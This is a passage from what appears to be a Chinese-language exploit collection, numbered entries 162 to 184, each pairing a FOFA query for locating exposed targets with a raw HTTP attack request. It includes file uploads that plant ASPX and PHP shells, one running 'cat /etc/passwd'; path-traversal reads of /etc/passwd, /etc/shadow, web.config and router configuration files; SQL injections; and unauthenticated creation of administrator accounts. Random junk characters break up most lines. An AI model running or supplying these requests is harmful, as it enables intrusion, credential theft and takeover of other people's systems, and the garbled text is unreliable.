xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
7 K: P# o. y9 X( c4 w. S5 b u<soap:Body>
' I7 h' c) s! f6 S) a<UploadResume xmlns="http://tempuri.org/">; C* k0 B; y6 h( V3 W. ?2 t! K
<ip>1</ip>8 }0 A1 E! x" H( P6 I5 N7 i( m
<fileName>../../../../dizxdell.aspx</fileName>3 Y4 w3 V- a4 `# U" |+ I7 _9 G
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>$ N1 ^1 U( w, i# I& V3 b
<tag>3</tag>
' z, P8 Z6 f4 V8 K</UploadResume>
( ]0 C' q% X0 u0 B! Q* b</soap:Body>) K6 G! ?3 P9 a
</soap:Envelope>
1 O3 N4 P; u: U F- a3 s- j" t" a4 t
3 l5 s5 G" a9 B/ U- M, nhttp://x.x.x.x/dizxdell.aspx: T) o& a+ `/ z; z3 D
7 H# b; s2 F. _5 W9 s" l
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传2 x& W9 c9 `% y1 {' p! p3 l
FOFA: app="和丰山海-数字标牌"
4 C" P) v3 a. q% @- a7 c! ZPOST /QH.aspx HTTP/1.1
7 X! E3 n; P/ [Host: x.x.x.x
- g) z/ ^1 i$ M2 e C6 G7 @+ [* K5 W3 l8 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
; i* S% [. l! {" _. l7 B, lConnection: close
' n& ^$ l$ w+ ~# l/ k/ `Content-Length: 583, ?, E$ h* M# |3 d& ]+ b9 j0 |9 p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey6 _" x2 x; L& Y" |1 ~( T# h
Accept-Encoding: gzip2 A" {9 H* ^ P: Y$ W u& w
; M; a/ j9 |$ s* f1 m4 C
------WebKitFormBoundaryeegvclmyurlotuey4 i) D- d% g2 f9 b/ M) B% T
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"0 }. G: ^# L* N9 y; ?
Content-Type: application/octet-stream
/ N8 Y. T6 G& ]4 u' J0 w4 }2 B' l& n6 L& k) z9 ?; G' P
<% response.write("ujidwqfuuqjalgkvrpqy") %># a+ o9 X+ q! f* M, x' c
------WebKitFormBoundaryeegvclmyurlotuey' _" w* u8 U' L" e
Content-Disposition: form-data; name="action"/ g: `3 N/ ^* ]: j7 U! @
- E7 m& z1 g ?# x. Q0 Tupload1 g% p6 W- I! V5 H D" }
------WebKitFormBoundaryeegvclmyurlotuey
" f6 @6 \* i5 ]; Q9 RContent-Disposition: form-data; name="responderId"7 _2 g# S0 C% d( l
4 i9 e* z l: W. O6 L2 D) a
ResourceNewResponder
! f. B4 n' x2 l# n8 A% {+ k------WebKitFormBoundaryeegvclmyurlotuey
! P4 [" h7 \5 @& l# iContent-Disposition: form-data; name="remotePath"' o/ I1 M/ Z% T+ E3 u( D3 g
: n, u$ ~6 q4 w7 I
/opt/resources; U9 j2 Y4 ?2 }% _& x% Q
------WebKitFormBoundaryeegvclmyurlotuey--
@9 a) Y# }% P, @; e
% j4 i; C! e/ q9 o4 M) K$ T
. q5 A0 k9 G: K: `5 H) Ohttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
) _3 @6 ~8 y# X' e& ^2 U' D8 c& p; D7 w( J5 X7 G
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传( O& G f$ F# _$ U+ c1 K
FOFA: icon_hash="-795291075"0 o; S# i- i; g' q: U& C3 n
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1 h: U$ @( D' W! z8 I
Host: x.x.x.x
* _" i$ V. z' I% m0 e5 Y( LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
* L) n6 x8 y8 TConnection: close
L$ T( k9 d- ^, y6 j1 ^Content-Length: 293
# C8 b+ \# T: u7 ~' P/ Z7 ~Accept: */*6 J- @7 g+ L* s$ e3 V- J, }5 r
Accept-Encoding: gzip, deflate$ J2 r3 k- A3 O- U9 b A
Accept-Language: zh-CN,zh;q=0.9. x9 E0 f7 o/ {; r
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod4 B2 l1 G2 w- v- O- u
0 m. t2 p. [2 ]% U0 q% ~------iiqvnofupvhdyrcoqyuujyetjvqgocod9 Q9 x7 n! ~- {5 {
Content-Disposition: form-data; name="name"
H7 Z$ x- j; ` p% M( U: ^9 g; F* y5 T" p9 T
1.php
0 T5 q) I0 G8 A7 U( f% B' R6 B------iiqvnofupvhdyrcoqyuujyetjvqgocod2 L: j4 `" ?$ m% p
Content-Disposition: form-data; name="upfile"; filename="1.php"
! M2 N1 `$ u$ N% ~% X$ tContent-Type: image/jpeg
' ?3 m/ W# d% M3 t
L" ?* B4 @; R% }$ ]% K" [rvjhvbhwwuooyiioxega
. j5 Q0 Z9 ~# z0 y& I3 \# G' i* l------iiqvnofupvhdyrcoqyuujyetjvqgocod--
8 r- y( z( i3 \0 o1 N6 I
6 l+ \+ d1 @3 Q+ n$ Q3 _$ U
% u. p% L" E% c) |) o0 P164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
/ D% L" E/ a* `+ Z, Q3 p& Y$ aFOFA: title="智慧综合管理平台登入"
$ b, N9 L1 m, @+ t! r6 uPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.16 D3 P' }. l9 R6 k6 w* g' W4 B
Host: x.x.x.x
$ E& E2 u ]: K$ L( T+ [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0$ j! S8 K/ D) C0 k+ J3 x0 A U
Content-Length: 288
: O( l" v1 u6 Q& D+ j `5 mAccept: application/json, text/javascript, */*; q=0.01
4 c# p( V! {. b4 l% NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,2 X, z$ O6 V( k/ b3 v
Connection: close
$ g7 ]: ]2 T3 Q, N+ d4 O$ _7 [Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl; Q6 | f3 o, b& m4 o; r! R
X-Requested-With: XMLHttpRequest
* F% [/ |8 F$ YAccept-Encoding: gzip
! b& _# Y' o$ e% h; J' z7 H4 Q% G, K8 u4 O
------dqdaieopnozbkapjacdbdthlvtlyl% Y% ]( V) n, l7 Y J
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"+ |5 ]( v1 F5 Y; M- `2 N0 e
Content-Type: image/jpeg; Z0 e; Y3 n) i+ y S& N1 ]0 ?; {
& m7 Z3 P+ |& z; ^3 a: |! j
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>6 F4 |- E5 n' ~, h" i2 ?& O
------dqdaieopnozbkapjacdbdthlvtlyl--/ p- P9 F9 {2 ` w* Q
' [+ K# ^" j1 _: v* t5 b& F/ M7 p/ |3 c
7 B7 F7 o! w9 E! Phttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx& j$ f i( G! l' K
$ p' l2 U# x! @0 N" i0 Y- E. {
165. OrangeHRM 3.3.3 SQL 注入
) ?! S" D4 O- `1 D% T* aCVE-2024-36428; h/ K" m' `/ J2 M& h6 ~0 ]
FOFA: app="OrangeHRM-产品"
& C' J; J8 Z2 RURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))# `0 U9 y! l/ C0 ?4 a
. d" x3 [6 ?' r9 p2 h- @+ h0 g z; h M: F; h1 D
166. 中成科信票务管理平台SeatMapHandler SQL注入 C! ~# X# h8 V9 R; j
FOFA:body="技术支持:北京中成科信科技发展有限公司"
7 z2 G3 x- g, a8 aPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
# ^" F' G: B* o! ]Host:
6 z4 j& T+ C! b8 z+ APragma: no-cache- z( Z3 H/ r% ]' Q" |0 F1 c+ ?) O
Cache-Control: no-cache7 j4 u1 z; t% b7 @0 |7 ~
Upgrade-Insecure-Requests: 1
( L! z, @7 \# z4 `+ a) W' ~1 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.362 I1 E* u) A5 @7 }' w3 y2 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: h5 b& J. f8 l L* f6 o r& v8 l
Accept-Encoding: gzip, deflate
7 P& q% S$ x& R9 OAccept-Language: zh-CN,zh;q=0.9,en;q=0.8+ `* e6 E2 z" U* y
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE( S0 i3 J8 Q2 l& `) `
Connection: close% G+ \2 r* I8 `" G5 k
Content-Type: application/x-www-form-urlencoded5 M6 r3 p6 _ H& s
Content-Length: 89
3 n+ h: e, O3 o* u% j4 C# }
T- t6 A8 A( i1 f; gMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE( q7 o7 t8 X4 p' n- \
! ~) y% _/ d( U K$ x: v- X3 @* W- V" ]) ]; q3 n9 `
167. 精益价值管理系统 DownLoad.aspx任意文件读取
4 Y5 d/ c1 {& d$ j, r; n% ?FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
, @/ y; N. M& }- |GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
& s2 {1 l0 z( HHost:& Y! W' d# M7 F. u' I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( [$ f& ~! A) h
Content-Type: application/x-www-form-urlencoded
E/ q- ]0 Y& C5 WAccept-Encoding: gzip, deflate
P& l" P2 v. V% qAccept: */*' C" D; t( K' x
Connection: keep-alive
* d) R, x" }% k4 a* c
0 W: N0 D+ g9 | J* u8 P) h' r+ l2 |* N6 z+ ]- k6 X
168. 宏景EHR OutputCode 任意文件读取( o( Q1 Q" A9 X# p+ K
FOFA:app="HJSOFT-HCM"0 D$ ?' M) y+ q) j# P! u- p9 b
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.17 l/ X9 @0 `! j
Host: your-ip
/ o2 h( p6 h. k- D) W. vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36* @" s2 n) p% j$ s" R
Content-Type: application/x-www-form-urlencoded
i1 g3 L9 ?' N# B3 ^Connection: close
5 f- N$ T5 W) g+ F$ R9 x/ @& Y" J% C S
6 ?. a' ^; m" E. D0 ^
' @) D- s2 ^6 ]) A1 @- }169. 宏景EHR downlawbase SQL注入( z0 @2 J+ K2 J% J
FOFA:app="HJSOFT-HCM"5 F+ G: ^0 H {
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1; v4 {- a2 o4 A$ |
Host: your-ip
Q1 s9 e* y! [; _0 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, ~- i: ^3 A' n% ~ ]: l( {
Accept: */*1 [0 B7 Y+ V) ^+ g
Accept-Encoding: gzip, deflate' G0 g r$ D. O9 `6 Y0 \$ v( z
Connection: close3 p1 T+ V& X6 o: {4 w" x5 y
, O/ I8 z" z/ J4 w: Q2 z. D! l5 u
' r1 E& T6 J( `! r" e2 `, S; n4 _9 p n# W* y
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
: q2 b+ P: \7 \# u, |FOFA:body="/general/sys/hjaxmanage.js". Y, Q! v" V- ?' `3 j
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1 E7 P6 V O3 w. \- k
Host: balalanengliang
! Q" X% g8 Y9 ]7 L8 o, BUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" w# u& {9 P' m+ c$ U3 A( O
Content-Type: application/x-www-form-urlencoded
; P9 M5 R! o/ [0 S4 ^* G% {1 O: m4 r# ~% ^% W" _ G. P/ N
filename=../webapps/ROOT/WEB-INF/web.xml
9 V3 K4 j3 O- _$ {: y5 U4 k
& `7 i2 R$ z; c2 D: u; @. O, r6 q. Y1 U: K
171. 通天星CMSV6车载定位监控平台 SQL注入6 Y% a5 G3 s ^8 d/ k0 `
FOFA:body="/808gps/"
0 r0 l( _$ [0 m3 y. `- M1 ?GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.13 p) ]% o. N# Z6 I7 }0 _. x8 ~ k
Host: your-ip: U9 K9 j5 s: n5 X3 _7 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.01 A" |# l4 P- a( @$ w4 h8 ~
Accept: */*
8 d% v6 b" G9 |* C# r# w X; S& q. fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, i7 |; t- v6 o. v# @6 m
Accept-Encoding: gzip, deflate1 ~& _! r% l D* b4 x+ ~( F! W
Connection: close
8 e! P- u7 J/ U
- Y7 x0 S- h6 C+ |
0 r* ]' F5 t" G" [
9 b" G; ~% C" ~% j) N172. DT-高清车牌识别摄像机任意文件读取
3 n# |2 n5 b& p* m1 y8 a1 u: EFOFA:app="DT-高清车牌识别摄像机"
4 X3 U; K O: x3 i' m& p/ WGET /../../../../etc/passwd HTTP/1.1; V+ {7 E) p7 {! [9 D$ j: F
Host: your-ip. Y4 M; N# \0 S# t5 ~/ g f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: e* C" I2 S Q' m3 k# q5 |Accept-Encoding: gzip, deflate' O, C9 L; ~1 I
Accept: */*
) C) g A4 f* ~; F# S+ m$ Q# h) mConnection: keep-alive
; e+ M5 A# ^5 m% ]6 Z# ]! S# r4 u4 y8 D
) B( D( P5 [3 `% g. M& H! s
3 v& y- f5 Q7 k/ o1 x, b* b
173. Check Point 安全网关任意文件读取
4 {. D) z$ z4 G, ^" NCVE-2024-24919
9 c* ~. I. q- |1 G% H0 q& pFOFA:app="Check_Point-SSL-Network-Extender"9 o2 Z& n' H5 h- }; f. W1 c
POST /clients/MyCRL HTTP/1.1
2 H% ^' z- [/ }+ aHost: your-ip
6 r3 l% Y* A! | [7 RContent-Type: application/x-www-form-urlencoded% k, B/ M9 Y7 x2 |. ?7 ]% b
" _1 w8 R. Q7 h1 P
aCSHELL/../../../../../../../etc/shadow9 ?' ^# f% ` A3 M# Y/ Y9 g
4 n, C b ]1 F: L# s
& C4 W5 e9 O0 ?
) n* P5 {, E m. \% ~% A1 i174. 金和OA C6 FileDownLoad.aspx 任意文件读取6 g4 w3 H2 A) P8 f& K S/ A
FOFA:app="金和网络-金和OA"/ }2 ]0 c# ?7 h; x7 u
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1- A( y% d( a! O1 A
Host: your-ip
2 }5 d# l" t; p3 T2 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
k+ T* H# Y/ j7 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' p1 ~5 ]$ Q) T2 y; O
Accept-Encoding: gzip, deflate, br
! G. f+ N0 l; A( K, H) u0 F! C! zAccept-Language: zh-CN,zh;q=0.9
3 _+ b3 d, O: ?: K$ EConnection: close
. b( d1 X6 _4 j! T! `9 i) h+ r
9 O8 x }. k. z: a
! W- E$ T" f4 J' C. j% q$ z0 A6 ?. i, p$ O0 \+ q
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入3 O7 o3 }6 s* J- m$ H
FOFA:app="金和网络-金和OA"
1 q0 ?: Q+ `2 IGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1/ [ E( w- [0 M6 J' z3 G
Host:
. ]5 m' g6 ]0 O) wUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 w |+ m5 I b: r% d% EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; H b. x' K, Y8 ~, f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" h# G+ x% t! {, y* Q% L: Q
Accept-Encoding: gzip, deflate
1 I9 N3 [4 P4 m: E6 wConnection: close W1 m# m# a) {7 T! B
Upgrade-Insecure-Requests: 1
8 H$ @" O1 L4 X
! B1 \9 t' x& a0 z' o7 U" r j$ P2 M3 ~- y7 Z$ W6 o
176. 电信网关配置管理系统 rewrite.php 文件上传0 y) u! O# B/ W, N
FOFA:body="img/login_bg3.png" && body="系统登录"6 R1 `/ O) n' C) a
POST /manager/teletext/material/rewrite.php HTTP/1.17 Q) Z& U- W1 w3 g
Host: your-ip
3 b! ]3 A* X& ]) S3 O, U" _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
( |2 X# `3 B& C- f5 C4 gContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
" [8 d' M4 a; w8 B% \4 h# ?9 pConnection: close7 i% A* A9 r. S4 l5 u$ N5 d
8 Z2 i2 F4 G |4 C) T' {------WebKitFormBoundaryOKldnDPT+ {6 A! i% v' K& O( j7 T4 Z
Content-Disposition: form-data; name="tmp_name"; filename="test.php"5 C+ A- [5 p8 M1 {% n! i! J n6 ^
Content-Type: image/png8 ]8 s# x9 N& {
& c4 [4 d3 X; r1 X( o; N/ P r s
<?php system("cat /etc/passwd");unlink(__FILE__);?>
, A- O) Q9 I' g! u------WebKitFormBoundaryOKldnDPT! p5 y: m8 f. W2 n: E
Content-Disposition: form-data; name="uploadtime"5 \; l& K i& W0 |
' Q8 D" ]3 N7 z4 O2 W) P: E
. \ S, q( I) ^2 r; W3 b9 [------WebKitFormBoundaryOKldnDPT--
; _9 v( u& c8 A! y
+ M+ n' @0 I! y. I4 _0 R, g+ T7 @1 n/ x
* e4 m( O5 u' q' {9 I177. H3C路由器敏感信息泄露
4 \/ I4 h/ x# T, u/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg d" p. {5 e" g- k) e' C
/userLogin.asp/../actionpolicy_status/../M60.cfg8 d( d- S& h3 u* _1 F7 D
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
; K5 t: N- y! n) j2 d/userLogin.asp/../actionpolicy_status/../GR5200.cfg
; W9 R) ]- I" X1 w F/userLogin.asp/../actionpolicy_status/../GR3200.cfg/ x1 Q c, e% ^$ R8 s
/userLogin.asp/../actionpolicy_status/../GR2200.cfg' }, {- h- Z) J
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
f5 V6 r7 s9 c# p0 H0 v/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
. o- t5 Z8 C$ Y; |: y/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
5 s' H; { H; e) O/ h* y3 H% l/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
" Z) v2 |7 d4 m, ~9 {7 b' N6 G/userLogin.asp/../actionpolicy_status/../ER5200.cfg
' ^* f: ?; m8 b) e, q6 L! G/userLogin.asp/../actionpolicy_status/../ER5100.cfg
) I0 [4 m2 ]' |, g/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
! f8 s% K# o; ?6 l& Y/userLogin.asp/../actionpolicy_status/../ER3260.cfg$ t( h; c3 F! Q0 x7 ]/ e; I
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
# a- W! \7 d& K7 ?/userLogin.asp/../actionpolicy_status/../ER3200.cfg0 T3 a( @, t. F, `: {
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg: Z( c! J! Y+ q( K- L
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg% m' p& g/ j$ d ?' z3 o
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg' ^" B- T+ ^0 B; N! N
/userLogin.asp/../actionpolicy_status/../ER3100.cfg8 N' R2 k' a4 B7 T4 ^9 N
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg# M. E2 n: e A/ h* b
9 L5 I+ B* f3 _8 _- A% s
& L6 M' e1 E4 b% n3 r
178. H3C校园网自助服务系统-flexfileupload-任意文件上传" {# m1 O! \5 f7 ?- R
FOFA:header="/selfservice"2 o2 D* s# }' u- i
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.16 s$ d/ v' t$ m) L8 h
Host:
: o- i( I' a# d6 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 Z& T3 n5 e: MContent-Length: 252# J6 D7 d' Q" o9 }& S
Accept-Encoding: gzip, deflate
, k6 |; |5 [" e! D/ N6 O9 cConnection: close+ G6 k& K! F4 m7 f% I3 i
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l' |4 j9 m. S+ H9 _0 [" g
-----------------aqutkea7vvanpqy3rh2l
5 P; V' t4 {0 T/ ?+ c8 W3 cContent-Disposition: form-data; name="12234.txt"; filename="12234"
/ x% }" t# \; l {1 [Content-Type: application/octet-stream1 Y- Q& p8 G: e9 c/ i$ W. h
Content-Length: 255
2 S* z+ W. \; M! }, ?- M- D L2 l0 Q/ v% R Y0 m, ]- C
122341 R* H# B( z2 n
-----------------aqutkea7vvanpqy3rh2l--: I- H( B, y5 B
6 f0 B# _# q$ v* `
g& M7 k# O) y; s5 ?1 H6 \; FGET /imc/primepush/%2e%2e/flex/12234.txt) U5 N3 {5 u, b' m+ A
; I" ^6 ?2 g6 O: G* y2 k H( r
, D7 F7 ~9 Y; N& ]8 a- h' N179. 建文工程管理系统存在任意文件读取' E4 i; f! W( T% q
POST /Common/DownLoad2.aspx HTTP/1.1
$ u" A4 X% f* k# A) }) l% \7 ]' zHost: {{Hostname}}
* g$ d2 V. b- lContent-Type: application/x-www-form-urlencoded7 E% j5 W; n6 b1 H
User-Agent: Mozilla/5.0' Q+ H% L! ]& t: T" [8 X
' _1 F! I/ R1 a: h: o% ?" mpath=../log4net.config&Name=
# g5 \3 ~0 ]7 ]$ W- Y( N1 ^5 i) A2 x
: w7 n( s% z0 E2 ~
180. 帮管客 CRM jiliyu SQL注入
3 ?2 A8 z5 k! w0 `FOFA:app="帮管客-CRM"8 j' C$ H0 X; W- n2 |
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
7 i( x7 h C, \1 x3 r+ ]9 oHost: your-ip% ?; f# U. X1 ~7 D( G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 @$ W* y0 _% H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: I" W; t+ T! o* a6 }' x) dAccept-Encoding: gzip, deflate& `6 \5 U8 x- D
Accept-Language: zh-CN,zh;q=0.9
j$ P2 J% X5 M C' |( Y8 Y5 J$ I5 ZConnection: close. G# k$ g4 i, m/ H% Q
) u0 r9 C& ]. ?. y8 _
0 X& P: N! T8 L3 @181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入* X/ E% w# `8 E* k& f; ?7 O
FOFA:"PDCA/js/_publicCom.js"! \( `2 Q- J" m8 J- v6 D: ^6 I9 G
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.18 F6 k1 ]- Z a% z2 i
Host: your-ip
8 {/ }: S1 H2 v" [, m! oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
; B) [3 c- L8 P% H* H l0 P" EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 o, `: n8 J2 M3 e2 Y, e8 Q! u; ~Accept-Encoding: gzip, deflate, br1 @- B4 L& ]/ p% p2 q: S- [
Accept-Language: zh-CN,zh;q=0.9
* m2 s7 h0 a9 BConnection: close
" B/ T9 n2 s; j: r B! [) FContent-Type: application/x-www-form-urlencoded
$ n1 q0 u, q! q1 o }3 T& X- X* g; r2 x& ~" A
) N1 S. h J1 Gaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
% {# D4 i& ^' R
& P% ]- D# R9 O5 }* c+ Y
+ J% E) K0 l0 ^* J' v182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
6 K) ?3 H8 J1 x' ^' KFOFA:"PDCA/js/_publicCom.js"
0 i5 g( ]6 r! B" W1 N# A) Q; ZPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1% U$ W% Q: b/ h4 A* B% ^! D
Host: your-ip
; [& M6 Y7 g& J7 p8 c0 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
$ }, r+ ]( z. T4 v2 ?1 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 ]$ t( {# ^: B7 l! J7 G4 }Accept-Encoding: gzip, deflate, br
( m$ H4 R$ X3 EAccept-Language: zh-CN,zh;q=0.9& N" v$ J) A: x8 O. L8 {
Connection: close
; n2 Z4 P1 d7 a: Q# I! h7 `! CContent-Type: application/x-www-form-urlencoded
; h) E1 u+ _3 k) F* h- Q ` J5 m: ^
8 n. C [2 b6 ^' m2 E5 F! V2 i
; F0 ~( `, {% ~username=test1234&pwd=test1234&savedays=18 i1 I% E! N9 C6 p; |
3 W- L0 _ q: q
; K; m2 o2 j7 e5 [% C j183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入0 I4 \0 J j; F* I
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"7 u: g8 Y9 o I8 T2 ]! ~$ ~) s
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.18 o5 }5 P2 e3 s2 Q4 v9 {7 Y) ]
Host: your-ip% C) e; h/ l7 E) Z
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
, b# L, R- W9 u! L9 J4 pAccept-Charset: utf-8
4 \5 H5 U7 { f) [) mAccept-Encoding: gzip, deflate
4 ^0 E/ q6 O$ n, J; P# sConnection: close
* a" j. A V |% ~# m7 @
: t- m# |5 v+ O7 s1 U9 e4 F
4 S4 n4 |2 Y" l8 \. w184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加* g7 } B. q0 y& p- i) {
FOFA:server="SunFull-Webs"! P; q, c8 w6 Y) a I* B0 J2 U1 \) e d/ F
POST /soap/AddUser HTTP/1.1
6 y; ]& a# J* n6 v8 p8 gHost: your-ip
+ I/ r4 j) _' l1 ?8 a* m7 MAccept-Encoding: gzip, deflate: [! k P' V/ ^- w( ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0: @8 P1 S( |7 n
Accept: application/xml, text/xml, */*; q=0.01; C4 [4 `% W7 F
Content-Type: text/xml; charset=utf-8$ p2 i* L) M+ ~' W. C8 G2 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" w4 s: c# @3 e+ q( \" m! J7 U
X-Requested-With: XMLHttpRequest
: ^' c# X4 p9 `3 _3 B7 P! i9 n4 C/ D) N1 Q
9 E$ ~; ^; i3 x, m
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'), |2 U1 S& X) ~& ^
3 \ \7 z- I$ c* H$ n( E
